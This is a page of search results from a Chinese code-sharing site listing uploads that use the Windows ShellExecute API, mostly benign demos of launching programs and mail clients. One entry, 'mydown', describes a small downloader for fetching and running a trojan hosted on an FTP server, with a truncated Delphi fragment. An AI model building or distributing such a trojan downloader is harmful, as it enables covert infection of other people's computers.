CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 搜索资源 - ShellExecute

搜索资源列表

  1. TestOld

    0下载:
  2. 这是利用ShellExecute来执行程序,也涉及到文件的一些操作-This is the use of ShellExecute to implement procedures, but also to document the operation
  3. 所属分类:文件操作

    • 发布日期:2008-10-13
    • 文件大小:38866
    • 提供者:fansylih
  1. mydown

    0下载:
  2. 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadF
  3. 所属分类:网络编程

    • 发布日期:2008-10-13
    • 文件大小:1436
    • 提供者:韩冰
  1. Simple_email_transmiter

    0下载:
  2. 该程序制作了一个简单的E-MAIL发送器,在VC中可以用ShellExecute函数简单的调用默认的电子邮件程序。
  3. 所属分类:通讯编程

    • 发布日期:2008-10-13
    • 文件大小:10959
    • 提供者:徐亮
  1. try

    0下载:
  2. 本例是一个用ShellExecute函数调用相应文档的一个例子,非常简单,自己可以照例添加自己的句子进去。
  3. 所属分类:系统编程

    • 发布日期:2008-10-13
    • 文件大小:2312525
    • 提供者:zj
  1. WinExecShellExecute

    0下载:
  2. 在for DOS的C语言中,有一个system()函数,其功能是执行命令行程序,在VB中也有shell()函数,在Windows程序设计中WinAPI也为我们提供了类似的函数,它们就是WinExec()和ShellExecute(),下面就来讨论一下这两个函数的用法。
  3. 所属分类:软件工程

    • 发布日期:2008-10-13
    • 文件大小:5720
    • 提供者:lijing
  1. 深入浅出ShellExecute

    1下载:
  2. 深入浅出ShellExecute -Explain the profound things of Shell Execute.
  3. 所属分类:Windows编程

    • 发布日期:2008-10-13
    • 文件大小:1930
    • 提供者:吴汉
  1. ShellExecute

    0下载:
  2. this to implement shellexecute function -this is to implement shellexecute function
  3. 所属分类:Applications

    • 发布日期:2017-04-02
    • 文件大小:32041
    • 提供者:funpro
  1. CreateProcessMFC

    0下载:
  2. 分别用CreateProcess()和ShellExecute()实现打开新的应用程序,并在规定时间内关掉进程。-Were treated with CreateProcess () and ShellExecute () the realization of new applications to open and turn off the process of the time.
  3. 所属分类:Windows Kernel

    • 发布日期:2017-04-04
    • 文件大小:45961
    • 提供者:逍遥客
  1. ShellExecute

    0下载:
  2. ShellExecute的使用技巧演示!-The use of ShellExecute presentation skills!
  3. 所属分类:Hook api

    • 发布日期:2017-04-09
    • 文件大小:25918
    • 提供者:shingpha
  1. Quick_Launch

    0下载:
  2. 在编程运用了众多的编程小功能: 1、ToolTip 鼠标移动到一个按钮上时,自动弹出一些提示,本程序采用了XInfoTip; 2、Mouse 在程序添加了动态鼠标功能; 3、Icon 软件不采用VC6.0的默认图标; 4、托盘显示与软件界面前端显示; 5、使用ShellExecute()函数调用其他程序。-Use in programming a wide range of programming a small function: 1, ToolTip to a mouse
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-23
    • 文件大小:80535
    • 提供者:Liu
  1. MpcController

    0下载:
  2. 简单的API函数CreateToolhelp32Snapshot ShellExecute PostMessage 用法 VS2005 C-CreateToolhelp32Snapshot ShellExecute PostMessage about some API method in VS2005 C++
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-06
    • 文件大小:938
    • 提供者:林齐
  1. test

    0下载:
  2. Run exe by shellExecute
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-24
    • 文件大小:24374
    • 提供者:air
  1. AudioCDDlg

    0下载:
  2. Auto-Run to media files or already playlist file you had one by using ShellExecute API for OSMSWindowsX
  3. 所属分类:Audio program

    • 发布日期:2017-04-04
    • 文件大小:1946
    • 提供者:hakanbul
  1. CreateProcess

    0下载:
  2. CreateProcess,WinExec,ShellExecute 三种打开进程的函数使用例子-CreateProcess, WinExec, ShellExecute function of the use of three examples of open process
  3. 所属分类:Other windows programs

    • 发布日期:2017-03-23
    • 文件大小:66862
    • 提供者:daiafei
  1. execute

    0下载:
  2. ExecuteFile(FileName: string) filename complete path plus parameters win32 api function ShellExecute-ExecuteFile(FileName: string) filename complete path plus parameters win32 api function ShellExecute
  3. 所属分类:Delphi VCL

    • 发布日期:2017-03-29
    • 文件大小:7554
    • 提供者:batlerboy
  1. WinAPI-ShellExecute

    0下载:
  2. WinAPI ShellExecute调用文件-WinAPI ShellExecute call file
  3. 所属分类:Windows Develop

    • 发布日期:2017-04-06
    • 文件大小:6520
    • 提供者:李澈
  1. ShellExecute

    0下载:
  2. C程序调用ShellExecute函数打开发邮件的OutLook程序,编译成功后会生成一个命令提示符可执行程序,打开后显示:确认打开邮件收发程序!(Y/N),如果选择Y,则调用Windows系统的OutLook程序,进行邮件发送,向读者演示如何在C语言中调用ShellExecute函数。-C program calls the ShellExecute function is to fight the development OutLook mail program, compiled afte
  3. 所属分类:Windows Kernel

    • 发布日期:2017-03-31
    • 文件大小:2334
    • 提供者:张名
  1. ShellExecRunAs

    0下载:
  2. Application in VB6 using ShellExecute,to run another application in elevated privilege
  3. 所属分类:Shell api

    • 发布日期:2017-04-02
    • 文件大小:2555
    • 提供者:motash
  1. shellExecute

    0下载:
  2. WindowAPI应用一例,用ShellExecute打开本机中指定的目录。-WindowAPI application one example, use ShellExecute to open the machine in the specified directory.
  3. 所属分类:Delphi VCL

    • 发布日期:2017-03-29
    • 文件大小:13005
    • 提供者:jf
  1. ShellExecute

    0下载:
  2. Visual C++ 网络开发与实战 第五章 邮件传输系统 使用ShellExecute命令打开windows自带邮件系统-The ShellExecute command the Visual C++ web development and Chapter 5 of the actual e-mail transmission system to open the windows built-in e-mail system
  3. 所属分类:WinSock-NDIS

    • 发布日期:2017-11-10
    • 文件大小:2147534
    • 提供者:name
« 12 3 »
搜珍网 www.dssz.com